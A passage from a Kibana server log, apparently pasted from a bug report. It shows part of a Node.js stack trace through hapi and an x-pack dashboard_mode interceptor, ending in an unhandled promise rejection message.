(/usr/share/kibana/node_modules/items/lib/index.js:36:13)\n    at done (/usr/share/kibana/node_modules/items/lib/index.js:28:25)\n    at Hoek.once (/usr/share/kibana/node_modules/hapi/lib/protect.js:52:16)\n    at wrapped (/usr/share/kibana/node_modules/hoek/lib/index.js:879:20)\n    at done (/usr/share/kibana/node_modules/items/lib/index.js:31:25)\n    at Function.wrapped [as _next] (/usr/share/kibana/node_modules/hoek/lib/index.js:879:20)\n    at Function.internals.continue (/usr/share/kibana/node_modules/hapi/lib/reply.js:108:10)\n    at method (/usr/share/kibana/node_modules/x-pack/plugins/dashboard_mode/server/dashboard_mode_request_interceptor.js:44:7)\n    at Items.serial (/usr/share/kibana/node_modules/hapi/lib/request.js:403:22)"},"message":"Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 3)"}
```